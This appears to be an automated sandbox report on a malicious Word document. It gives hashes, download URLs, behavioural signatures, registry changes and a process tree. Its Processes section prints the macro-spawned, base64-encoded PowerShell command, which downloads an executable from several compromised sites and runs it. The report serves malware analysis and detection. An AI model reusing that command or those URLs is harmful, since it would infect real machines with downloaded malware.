Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 01:47
Behavioral task
behavioral1
Sample
f4e7d953e025517305153b5c50afc0c3_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f4e7d953e025517305153b5c50afc0c3_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
f4e7d953e025517305153b5c50afc0c3_JaffaCakes118.doc
-
Size
210KB
-
MD5
f4e7d953e025517305153b5c50afc0c3
-
SHA1
81b5499424735a0ab1f30c8ddd2ab52308119d63
-
SHA256
f41df92a7bf31e22ac28e3e35cabf45f3be392f06c43b813eea05e2ca08f24bc
-
SHA512
1a1b8660b2bc32cba99fbe803f542680715cc572bd57f4d3541710f982c9a074e970c5c7f9916789a364217da5ebb0a94ec5830b6ffeabd197bd536faec8e868
-
SSDEEP
3072:0P22TWTogk079THcpOu5UZXN5kmcB/YNYsgU:E/TX07hHcJQZe0jj
Malware Config
Extracted
https://waytoger.com/wp-admin/w/
https://jaguarssus.xyz/wp-admin/GfU/
https://learnkalmar.com/wp-includes/VSZ/
http://tiendapablus.net/cgi-bin/SIr/
https://prsaze.com/wp-admin/7a/
https://www.campuscamarafp.com/wp-admin/N/
https://infolockerz.com/wp-content/x/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 2752 powershell.exe 30 -
Blocklisted process makes network request 5 IoCs
flow pid Process 8 2992 powershell.exe 11 2992 powershell.exe 12 2992 powershell.exe 14 2992 powershell.exe 15 2992 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D205039A-8B69-4F9F-BAC4-D7D891B1967C} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\TypeLib\{D205039A-8B69-4F9F-BAC4-D7D891B1967C}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2556 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2556 WINWORD.EXE 2556 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2556 wrote to memory of 3060 2556 WINWORD.EXE 34 PID 2556 wrote to memory of 3060 2556 WINWORD.EXE 34 PID 2556 wrote to memory of 3060 2556 WINWORD.EXE 34 PID 2556 wrote to memory of 3060 2556 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f4e7d953e025517305153b5c50afc0c3_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABNAGEAaQAzAHYAMwB2AD0AKAAoACcAQwBzACcAKwAnADcAcgB6ACcAKQArACcAMwAnACsAJwBsACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAFIAbwBGAEkAbABlAFwAbwBxAHYASQBfADQARQBcAFoAZgBJADUAQwBLAFgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAHQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAGAAYwBVAHIAaQBgAFQAeQBwAFIATwBgAFQATwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKwAnACwAIAAnACsAKAAnAHQAbAAnACsAJwBzADEAMQAsACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAFAANQA5AHYAcABhAHcAIAA9ACAAKAAnAEoAJwArACgAJwBuADcAeAB2ACcAKwAnAGkAbwAwACcAKQApADsAJABGAHMAagByAHIANQBsAD0AKAAoACcAVwBkAHAAJwArACcAMwAnACkAKwAnADYAJwArACcAbgA0ACcAKQA7ACQAVAA0AHIAcwBwADEAawA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBPAHEAdgBpAF8ANABlAHsAJwArACcAMAB9AFoAJwArACgAJwBmACcAKwAnAGkANQBjACcAKQArACcAawB4AHsAJwArACcAMAAnACsAJwB9ACcAKQAgAC0ARgAgACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAFAANQA5AHYAcABhAHcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFEAZQByADkAeAB2AGgAPQAoACgAJwBTAHEAJwArACcAegAnACkAKwAnAHAAYQAnACsAJwBzAGsAJwApADsAJABHADkAbwBfAHUAYwBqAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAGUAVAAuAHcAZQBCAEMAbABJAEUATgB0ADsAJABRAG8AbwByAGsAdwBuAD0AKAAoACcAaAAnACsAJwB0AHQAcAAnACkAKwAoACcAcwAnACsAJwA6AC8ALwB3AGEAJwApACsAJwB5AHQAJwArACgAJwBvACcAKwAnAGcAZQByAC4AJwArACcAYwAnACsAJwBvAG0ALwB3AHAALQBhACcAKQArACgAJwBkAG0AaQBuAC8AdwAnACsAJwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAagBhAGcAdQBhACcAKQArACgAJwByAHMAJwArACcAcwAnACsAJwB1AHMAJwArACcALgB4AHkAegAnACkAKwAnAC8AdwAnACsAKAAnAHAALQAnACsAJwBhAGQAbQAnACkAKwAnAGkAJwArACcAbgAnACsAJwAvAEcAJwArACgAJwBmAFUALwAqACcAKwAnAGgAdAAnACkAKwAnAHQAJwArACcAcABzACcAKwAoACcAOgAvAC8AJwArACcAbAAnACkAKwAnAGUAYQAnACsAKAAnAHIAJwArACcAbgBrACcAKQArACcAYQAnACsAJwBsACcAKwAoACcAbQBhAHIAJwArACcALgBjACcAKQArACcAbwBtACcAKwAoACcALwAnACsAJwB3AHAALQAnACsAJwBpAG4AYwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzAC8AVgBTACcAKwAnAFoALwAqAGgAJwApACsAJwB0AHQAJwArACgAJwBwADoAJwArACcALwAvAHQAJwApACsAJwBpACcAKwAoACcAZQBuAGQAJwArACcAYQAnACkAKwAoACcAcABhAGIAbAB1AHMALgAnACsAJwBuACcAKwAnAGUAdAAnACkAKwAoACcALwBjACcAKwAnAGcAaQAtACcAKQArACcAYgAnACsAJwBpAG4AJwArACcALwAnACsAJwBTACcAKwAnAEkAcgAnACsAKAAnAC8AKgAnACsAJwBoAHQAdABwACcAKQArACgAJwBzACcAKwAnADoALwAvACcAKwAnAHAAcgBzAGEAJwApACsAJwB6ACcAKwAoACcAZQAuAGMAJwArACcAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGEAJwArACcAZABtACcAKQArACgAJwBpAG4ALwA3ACcAKwAnAGEALwAqACcAKwAnAGgAdAB0ACcAKQArACcAcABzACcAKwAnADoALwAnACsAJwAvACcAKwAoACcAdwB3AHcALgBjAGEAbQBwACcAKwAnAHUAcwBjACcAKwAnAGEAJwArACcAbQBhACcAKQArACcAcgBhACcAKwAnAGYAJwArACgAJwBwAC4AYwBvAG0AJwArACcALwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AaQBuACcAKwAnAC8ATgAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAaQBuACcAKwAnAGYAbwBsAG8AYwBrAGUAcgAnACkAKwAoACcAegAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvAHcAcAAtAGMAbwAnACsAJwBuACcAKQArACcAdAAnACsAJwBlACcAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAJwB4AC8AJwApAC4AIgBTAHAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEgAYwBuAGoAbAByAHgAPQAoACcATwBsACcAKwAoACcANQB5ADcAJwArACcAMwB0ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQATwBfAGwAcQBjAGcAcQAgAGkAbgAgACQAUQBvAG8AcgBrAHcAbgApAHsAdAByAHkAewAkAEcAOQBvAF8AdQBjAGoALgAiAEQAYABvAHcAYABOAEwATwBhAGQARgBpAGAATABlACIAKAAkAE8AXwBsAHEAYwBnAHEALAAgACQAVAA0AHIAcwBwADEAawApADsAJABDADMAMABkADgAYgBjAD0AKAAoACcASAAnACsAJwBwADMAYQAnACkAKwAoACcAZgA4ACcAKwAnAGcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVAA0AHIAcwBwADEAawApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADkANwApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACgAJABUADQAcgBzAHAAMQBrACkAOwAkAFYAcwAzAGEAdQB1AGYAPQAoACcAVQAnACsAKAAnAG4AJwArACcAbQAyACcAKQArACgAJwB0ADAAJwArACcAMAAnACkAKQA7AGIAcgBlAGEAawA7ACQAUgBtAGkAdABnAHoAaQA9ACgAKAAnAFMAJwArACcAMAA3ACcAKQArACgAJwAxACcAKwAnAHgAdQAnACkAKwAnAHkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNADYAYwBqADIAYQB0AD0AKAAnAFUAeAAnACsAKAAnAGUAJwArACcAegAxACcAKQArACcANwAzACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5eb3fa1c9c4a0f0dd3bc2e15beb24daab
SHA1e1911cc8954254461703ff422b13bb2e456d739b
SHA2564d9ce3588252f63a5168683c57a0b535395ad2f95407a16691ab0c5c4800abd7
SHA512f4a5ab79446181b9af62218b7735ae308e2a11dce7b6cc4f391e570b645968fb0703e03b13710bf227bf95c4f34411ae273096c123007c4eb242bb22a2d56d5b